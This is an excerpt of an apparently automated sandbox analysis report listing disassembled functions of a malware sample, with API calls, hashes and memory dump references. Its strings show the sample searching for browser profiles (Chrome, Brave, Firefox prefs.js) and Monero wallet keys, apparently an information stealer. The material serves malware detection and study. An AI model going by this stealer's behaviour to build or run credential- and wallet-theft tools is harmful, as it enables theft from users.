                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 56888f76015318d567baf60b2d4794dc4c817567173a41dc16a25481df5f16e6
                              • Instruction ID: 5d440650d9afe22269974f0b09d7325150928002ecc91e6a037a870e2ae2ee02
                              • Opcode Fuzzy Hash: 56888f76015318d567baf60b2d4794dc4c817567173a41dc16a25481df5f16e6
                              • Instruction Fuzzy Hash: 68426572910114ABCB14FB70DD96EEE737DAF64300F804569F90AA6281EF349F49CB96
                              Function 001D4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001D492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                              • StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                              • StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                              • FindClose.KERNEL32(000000FF), ref: 001D4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 1aaf400b2273b4065d7d710ed087df150013bee714acd782618ae1de795e9bf1
                              • Instruction ID: 88271e41953303d751eedc97ec8f5d0b307ef1151e849d075bb1108da632243e
                              • Opcode Fuzzy Hash: 1aaf400b2273b4065d7d710ed087df150013bee714acd782618ae1de795e9bf1
                              • Instruction Fuzzy Hash: A06185B2900218ABCB24EBA0DD49FEE737CBB58700F04859DF509A6141EB71EB95CF95
                              Function 001D4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001D4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D4587
                              • wsprintfA.USER32 ref: 001D45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 001D45BD
                              • StrCmpCA.SHLWAPI(?,001E0FC4), ref: 001D45EB
                              • StrCmpCA.SHLWAPI(?,001E0FC8), ref: 001D4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001D468B
                              • FindClose.KERNEL32(000000FF), ref: 001D46A0
                              • lstrcat.KERNEL32(?,014AE968), ref: 001D46C5
                              • lstrcat.KERNEL32(?,014ADAC0), ref: 001D46D8
                              • lstrlen.KERNEL32(?), ref: 001D46E5
                              • lstrlen.KERNEL32(?), ref: 001D46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 2ecf64059963630326f3d8d1be13675cb67a6154dbf1603a9cfda91fdeb91f2e
                              • Instruction ID: c5f856407e258a052ae2599d85dd7bb0ee5b80aaa465ded0801dd50d23996156
                              • Opcode Fuzzy Hash: 2ecf64059963630326f3d8d1be13675cb67a6154dbf1603a9cfda91fdeb91f2e
                              • Instruction Fuzzy Hash: DC5187B6540318ABCB24FB70DD89FED737CAB58300F404599F649A2150EB74DB948F96
                              Function 001D3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001D3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 001D3EDA
                              • StrCmpCA.SHLWAPI(?,001E0FAC), ref: 001D3F08
                              • StrCmpCA.SHLWAPI(?,001E0FB0), ref: 001D3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001D406C
                              • FindClose.KERNEL32(000000FF), ref: 001D4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 8929d80d2bf58d2e1bf5e8093fa19bff467f998867212a4c16676e300cba3532
                              • Instruction ID: 36d819330a3fe5cbfa67e1748d38e914d685f96889a106bcc56d42a74520b081
                              • Opcode Fuzzy Hash: 8929d80d2bf58d2e1bf5e8093fa19bff467f998867212a4c16676e300cba3532
                              • Instruction Fuzzy Hash: D05196B6900318ABCB24FBB0DD85EEE737CBB58300F008599B659A2140DB75DB958F95
                              Function 00596E55 Relevance: 19.1, Strings: 14, Instructions: 1581COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !Uk>$%ov$&wm-$&wm-$,1{$Qt5u$Qt5u$Xuy9$^s?k$a3[>$x#r$yQ~$U[~$^Ok
                              • API String ID: 0-1170347932
                              • Opcode ID: 0b2693185a87ed4f28a7cbac7f5b62e5954216e14fcc15ca963f5ad178ae5416
                              • Instruction ID: f330054ff4dcbc63f1daeafeeb6d4f22687b50d0d10e3c5baef978a498c09b63
                              • Opcode Fuzzy Hash: 0b2693185a87ed4f28a7cbac7f5b62e5954216e14fcc15ca963f5ad178ae5416
                              • Instruction Fuzzy Hash: 8AB2D6F390C604AFE304AE29DC8567AFBE9EF94720F16492DEAC4C3744E63598058697
                              Function 001CED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001CED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 001CED55
                              • StrCmpCA.SHLWAPI(?,001E1538), ref: 001CEDAB
                              • StrCmpCA.SHLWAPI(?,001E153C), ref: 001CEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CF2AE
                              • FindClose.KERNEL32(000000FF), ref: 001CF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 8d687ff4be9061345a33a43469a9d63b62a70fe7df2096d34d3b24de0beeb19a
                              • Instruction ID: dc9e6e05c8c4ab6709d725fe156828a66ad3b960af8feb026d6509c95f429fcb
                              • Opcode Fuzzy Hash: 8d687ff4be9061345a33a43469a9d63b62a70fe7df2096d34d3b24de0beeb19a
                              • Instruction Fuzzy Hash: 35E1F6719111589ADB58FB60CC92EEE733CAF74301F8041EAB40A62152EF306F8ADF56
                              Function 001CF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E15B8,001E0D96), ref: 001CF71E
                              • StrCmpCA.SHLWAPI(?,001E15BC), ref: 001CF76F
                              • StrCmpCA.SHLWAPI(?,001E15C0), ref: 001CF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CFAB1
                              • FindClose.KERNEL32(000000FF), ref: 001CFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1df9f25bfe117f878832f95d010fb94f5fa2565fa8889998fec58aef569bd07f
                              • Instruction ID: a98f52f0f966995bf1ddefe405e60afa24da86f27c215506d3ab1f3b4b008df2
                              • Opcode Fuzzy Hash: 1df9f25bfe117f878832f95d010fb94f5fa2565fa8889998fec58aef569bd07f
                              • Instruction Fuzzy Hash: D9B145719002549BCB24FF64DC95FEE7379AF64300F8085ADA80A97251EF319B4ACF96
                              Function 001C16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E510C,?,?,?,001E51B4,?,?,00000000,?,00000000), ref: 001C1923
                              • StrCmpCA.SHLWAPI(?,001E525C), ref: 001C1973
                              • StrCmpCA.SHLWAPI(?,001E5304), ref: 001C1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001C1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 001C1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C1E20
                              • FindClose.KERNEL32(000000FF), ref: 001C1E32
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 4499aae7d39a0aad838535cfed8a3ed324d856b492386231e076b942e76157a1
                              • Instruction ID: 964470a5bacf9d5b5ac160f75110b0ab6e98accd27796b69f8b457517cde5eea
                              • Opcode Fuzzy Hash: 4499aae7d39a0aad838535cfed8a3ed324d856b492386231e076b942e76157a1
                              • Instruction Fuzzy Hash: 121247719501589BCB19FB60CCA6EEE7378AF74301FC0419AB50A62291EF306F89DF95
                              Function 001CDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001E0C2E), ref: 001CDE5E
                              • StrCmpCA.SHLWAPI(?,001E14C8), ref: 001CDEAE
                              • StrCmpCA.SHLWAPI(?,001E14CC), ref: 001CDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CE3E0
                              • FindClose.KERNEL32(000000FF), ref: 001CE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: cd28f9198bd80aded5ac6bec978e009426e997b3873533ab4f3556e7a22c67e1
                              • Instruction ID: 1124ace908988f3ddda8beda2e519476f274363886babafd1453db047a3f1229
                              • Opcode Fuzzy Hash: cd28f9198bd80aded5ac6bec978e009426e997b3873533ab4f3556e7a22c67e1
                              • Instruction Fuzzy Hash: 10F1A0718501689ADB19EB60DCA5EEE7378BF34301FC041EAB40A62191EF306F89DF56
                              Function 001CDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E14B0,001E0C2A), ref: 001CDAEB
                              • StrCmpCA.SHLWAPI(?,001E14B4), ref: 001CDB33
                              • StrCmpCA.SHLWAPI(?,001E14B8), ref: 001CDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CDDCC
                              • FindClose.KERNEL32(000000FF), ref: 001CDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: b4287a481f0c5099730c3f110a3235b3e57d39f48514e55985c8b86f1467d97b
